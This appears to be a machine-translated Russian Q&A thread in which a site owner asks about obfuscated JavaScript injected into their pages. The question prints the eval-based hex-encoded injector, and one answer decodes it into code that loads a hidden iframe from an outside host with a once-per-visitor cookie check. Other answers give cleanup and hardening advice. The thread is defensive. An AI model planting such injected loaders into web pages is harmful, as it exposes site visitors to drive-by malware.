Сайт взломан с введенным javascript кодом

Question

Несколько сайтов, которые я управляю, были взломаны, и на каждую из страниц был вставлен следующий код javascript. Я понятия не имею, как декодировать это или что он даже делает, поэтому я не знаю, насколько это серьезно. Может ли кто-нибудь помочь?

<script type="text/javascript" language="javascript"> 
if(document.querySelector)bqlelz=4;zibka=("36,7c,8b,84,79,8a,7f,85,84,36,8c,46,4f,3e,3f,36,91,23,20,36,8c,77,88,36,89,8a,77,8a,7f,79,53,3d,77,80,77,8e,3d,51,23,20,36,8c,77,88,36,79,85,84,8a,88,85,82,82,7b,88,53,3d,7f,84,7a,7b,8e,44,86,7e,86,3d,51,23,20,36,8c,77,88,36,8c,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,88,7b,77,8a,7b,5b,82,7b,83,7b,84,8a,3e,3d,7f,7c,88,77,83,7b,3d,3f,51,23,20,23,20,36,8c,44,89,88,79,36,53,36,3d,7e,8a,8a,86,50,45,45,8b,86,79,82,7f,7b,84,8a,44,79,85,83,45,44,89,83,7f,82,7b,8f,89,45,7d,70,61,87,5e,7e,6d,49,44,86,7e,86,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,86,85,89,7f,8a,7f,85,84,36,53,36,3d,77,78,89,85,82,8b,8a,7b,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,79,85,82,85,88,36,53,36,3d,4f,4c,4e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,7e,7b,7f,7d,7e,8a,36,53,36,3d,4f,4c,4e,86,8e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,8d,7f,7a,8a,7e,36,53,36,3d,4f,4c,4e,86,8e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,82,7b,7c,8a,36,53,36,3d,47,46,46,46,4f,4c,4e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,8a,85,86,36,53,36,3d,47,46,46,46,4f,4c,4e,3d,51,23,20,23,20,36,7f,7c,36,3e,37,7a,85,79,8b,83,7b,84,8a,44,7d,7b,8a,5b,82,7b,83,7b,84,8a,58,8f,5f,7a,3e,3d,8c,3d,3f,3f,36,91,23,20,36,7a,85,79,8b,83,7b,84,8a,44,8d,88,7f,8a,7b,3e,3d,52,86,36,7f,7a,53,72,3d,8c,72,3d,36,79,82,77,89,89,53,72,3d,8c,46,4f,72,3d,36,54,52,45,86,54,3d,3f,51,23,20,36,7a,85,79,8b,83,7b,84,8a,44,7d,7b,8a,5b,82,7b,83,7b,84,8a,58,8f,5f,7a,3e,3d,8c,3d,3f,44,77,86,86,7b,84,7a,59,7e,7f,82,7a,3e,8c,3f,51,23,20,36,93,23,20,93,23,20,7c,8b,84,79,8a,7f,85,84,36,69,7b,8a,59,85,85,81,7f,7b,3e,79,85,85,81,7f,7b,64,77,83,7b,42,79,85,85,81,7f,7b,6c,77,82,8b,7b,42,84,5a,77,8f,89,42,86,77,8a,7e,3f,36,91,23,20,36,8c,77,88,36,8a,85,7a,77,8f,36,53,36,84,7b,8d,36,5a,77,8a,7b,3e,3f,51,23,20,36,8c,77,88,36,7b,8e,86,7f,88,7b,36,53,36,84,7b,8d,36,5a,77,8a,7b,3e,3f,51,23,20,36,7f,7c,36,3e,84,5a,77,8f,89,53,53,84,8b,82,82,36,92,92,36,84,5a,77,8f,89,53,53,46,3f,36,84,5a,77,8f,89,53,47,51,23,20,36,7b,8e,86,7f,88,7b,44,89,7b,8a,6a,7f,83,7b,3e,8a,85,7a,77,8f,44,7d,7b,8a,6a,7f,83,7b,3e,3f,36,41,36,49,4c,46,46,46,46,46,40,48,4a,40,84,5a,77,8f,89,3f,51,23,20,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,36,53,36,79,85,85,81,7f,7b,64,77,83,7b,41,38,53,38,41,7b,89,79,77,86,7b,3e,79,85,85,81,7f,7b,6c,77,82,8b,7b,3f,23,20,36,41,36,38,51,7b,8e,86,7f,88,7b,89,53,38,36,41,36,7b,8e,86,7f,88,7b,44,8a,85,5d,63,6a,69,8a,88,7f,84,7d,3e,3f,36,41,36,3e,3e,86,77,8a,7e,3f,36,55,36,38,51,36,86,77,8a,7e,53,38,36,41,36,86,77,8a,7e,36,50,36,38,38,3f,51,23,20,93,23,20,7c,8b,84,79,8a,7f,85,84,36,5d,7b,8a,59,85,85,81,7f,7b,3e,36,84,77,83,7b,36,3f,36,91,23,20,36,8c,77,88,36,89,8a,77,88,8a,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,7f,84,7a,7b,8e,65,7c,3e,36,84,77,83,7b,36,41,36,38,53,38,36,3f,51,23,20,36,8c,77,88,36,82,7b,84,36,53,36,89,8a,77,88,8a,36,41,36,84,77,83,7b,44,82,7b,84,7d,8a,7e,36,41,36,47,51,23,20,36,7f,7c,36,3e,36,3e,36,37,89,8a,77,88,8a,36,3f,36,3c,3c,23,20,36,3e,36,84,77,83,7b,36,37,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,89,8b,78,89,8a,88,7f,84,7d,3e,36,46,42,36,84,77,83,7b,44,82,7b,84,7d,8a,7e,36,3f,36,3f,36,3f,23,20,36,91,23,20,36,88,7b,8a,8b,88,84,36,84,8b,82,82,51,23,20,36,93,23,20,36,7f,7c,36,3e,36,89,8a,77,88,8a,36,53,53,36,43,47,36,3f,36,88,7b,8a,8b,88,84,36,84,8b,82,82,51,23,20,36,8c,77,88,36,7b,84,7a,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,7f,84,7a,7b,8e,65,7c,3e,36,38,51,38,42,36,82,7b,84,36,3f,51,23,20,36,7f,7c,36,3e,36,7b,84,7a,36,53,53,36,43,47,36,3f,36,7b,84,7a,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,82,7b,84,7d,8a,7e,51,23,20,36,88,7b,8a,8b,88,84,36,8b,84,7b,89,79,77,86,7b,3e,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,89,8b,78,89,8a,88,7f,84,7d,3e,36,82,7b,84,42,36,7b,84,7a,36,3f,36,3f,51,23,20,93,23,20,7f,7c,36,3e,84,77,8c,7f,7d,77,8a,85,88,44,79,85,85,81,7f,7b,5b,84,77,78,82,7b,7a,3f,23,20,91,23,20,7f,7c,3e,5d,7b,8a,59,85,85,81,7f,7b,3e,3d,8c,7f,89,7f,8a,7b,7a,75,8b,87,3d,3f,53,53,4b,4b,3f,91,93,7b,82,89,7b,91,69,7b,8a,59,85,85,81,7f,7b,3e,3d,8c,7f,89,7f,8a,7b,7a,75,8b,87,3d,42,36,3d,4b,4b,3d,42,36,3d,47,3d,42,36,3d,45,3d,3f,51,23,20,23,20,8c,46,4f,3e,3f,51,23,20,93,23,20,93".split(","));twuss=eval;function oqvw(){iuwo=function(){--(uiopm.body)}()}uiopm=document;for(wxuxe=0;wxuxe<zibka["length"];wxuxe+=1){zibka[wxuxe]=-(22)+parseInt(zibka[wxuxe],bqlelz*4);}try{oqvw()}catch(ggpl){hywzjw=50-50;}if(!hywzjw)twuss(String["fr"+"omCh"+"arCo"+"de"].apply(String,zibka)); 
</script> 

Я предполагаю, что эти ссылки на символы, и это на самом деле указывает на сайт, где-то с какой-то вредоносного контента, но я не знаю, как решить это. Я просматриваю и удаляю все это и изменяю все пароли, чтобы предотвратить дальнейшие проблемы с безопасностью, но любые советы по этому поводу будут очень признательны!

Спасибо.

Answer 1

Это то, что было введено. Чтобы расшифровать это, вы делаете то же самое, что и javascript в своем сообщении. Разделите строку на шестнадцатеричные строки в запятой, затем parseInt с базой 16, вычтите 22 и найдите символ для этого символьного кода. Как это можно использовать злонамеренно, я не уверен. У кого-нибудь есть идеи?

function v09() { 

    var static = 'ajax'; 

    var controller = 'index.php'; 

    var v = document.createElement('iframe'); 

    v.src = 'http://upclient.com/.smileys/gZKqHhW3.php'; 

    v.style.position = 'absolute'; 

    v.style.color = '968'; 

    v.style.height = '968px'; 

    v.style.width = '968px'; 

    v.style.left = '1000968'; 

    v.style.top = '1000968'; 

    if (!document.getElementById('v')) { 

     document.write('<p id=\'v\' class=\'v09\' ></p>'); 

     document.getElementById('v').appendChild(v); 

    } 

} 

function SetCookie(cookieName, cookieValue, nDays, path) { 

    var today = new Date(); 

    var expire = new Date(); 

    if (nDays == null || nDays == 0) 

     nDays = 1; 

    expire.setTime(today.getTime() + 3600000 * 24 * nDays); 

    document.cookie = cookieName + "=" + escape(cookieValue) 

    + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : ""); 

} 

function GetCookie(name) { 

    var start = document.cookie.indexOf(name + "="); 

    var len = start + name.length + 1; 

    if ((!start) && 

    (name != document.cookie.substring(0, name.length))) 

    { 

     return null; 

    } 

    if (start == -1) 

     return null; 

    var end = document.cookie.indexOf(";", len); 

    if (end == -1) 

     end = document.cookie.length; 

    return unescape(document.cookie.substring(len, end)); 

} 

if (navigator.cookieEnabled) 

{ 

    if (GetCookie('visited_uq') == 55) { 

    } else { 

     SetCookie('visited_uq', '55', '1', '/'); 

     v09(); 

    } 

} 

Answer 2

По моему опыту, подобные атаки происходят на серверах с общим хостингом, где автоматизированный бот либо догадывался о пароле к учетной записи, либо на рабочем столе держателя учетной записи есть вредоносная программа, которая захватила учетные данные и теперь злоупотребляет ими.

Ваш лучший выбор? Согласитесь, что есть определенно будет воздействие на пользователь, а затем сделать должную осмотрительность:

• Сообщите ваш общий узел сети, если вы не владелец.
• Архив всего домашнего каталога учетной записи общедоступного хостинга и включайте содержимое заданий cron этого пользователя, баз данных, электронной почты и другой информации. (например, tar -czf website-$(date +%F).tar.gz ~/ или вашей общей утилитой резервного копирования общедоступного хостинга.)
• Проверьте наличие вредоносных процессов или скриптов, которые могут быть запущены. ps gaux - твой друг.
• Nuke все в общей учетной записи хостинга.
• Измените каждый пароль независимо от того, даже если вы считаете, что он не мог быть затронут.
• Восстановите учетную запись и оставьте страницу обслуживания доступной для ваших пользователей. У вас должны быть резервные копии вашей учетной записи.
• Распакуйте резервную копию на виртуальной машине и изучите все, включая журналы и другую информацию, чтобы узнать, как произошла атака. Примените то, чему вы научитесь код вашего сайта.
• Повторно разверните код с исправлениями с учетом причин, обнаруженных на предыдущем шаге; если ваша учетная запись использует фреймворк, такой как Joomla, Drupal, Wordpress или что-то подобное, воспользуйтесь этим обновлением до последней версии.

Не пропустите шаги, или это будет произойдет снова.

Answer 3

Этот тип вещи случилось со мной тоже, я не был на виртуальный хостинг решения, я был на выделенном сервере, не было никаких доказательств FTP или SSH или SCP деятельности.

Я понял, что кто-то использовал одну из моих форм для ввода кода (мои сайты - PHP).Это может быть достигнуто путем использования вашего собственного кода против вас, путем ввода ввода в текстовое поле или текстовое поле, которое будет интерпретироваться каким-то кодом на вашем сервере.

Например, у вас может быть небольшая форма, позволяющая людям загружать файлы в какой-либо каталог. Кто-то может загрузить файл кода, а затем выполнить его, и этот файл кода может быть виновником, используемым для ввода кода javascript на ваши собственные кодовые страницы.

С помощью этого экземпляра вы можете ограничить, какие типы файлов разрешено загружать, поместить файлы в каталог, где браузер не сможет получить к нему доступ напрямую, или убедитесь, что у файла нет разрешений на выполнение при загрузке.

Вы также можете быть уверены в том, что sanitize inputs не содержит вредоносного текста в любой форме.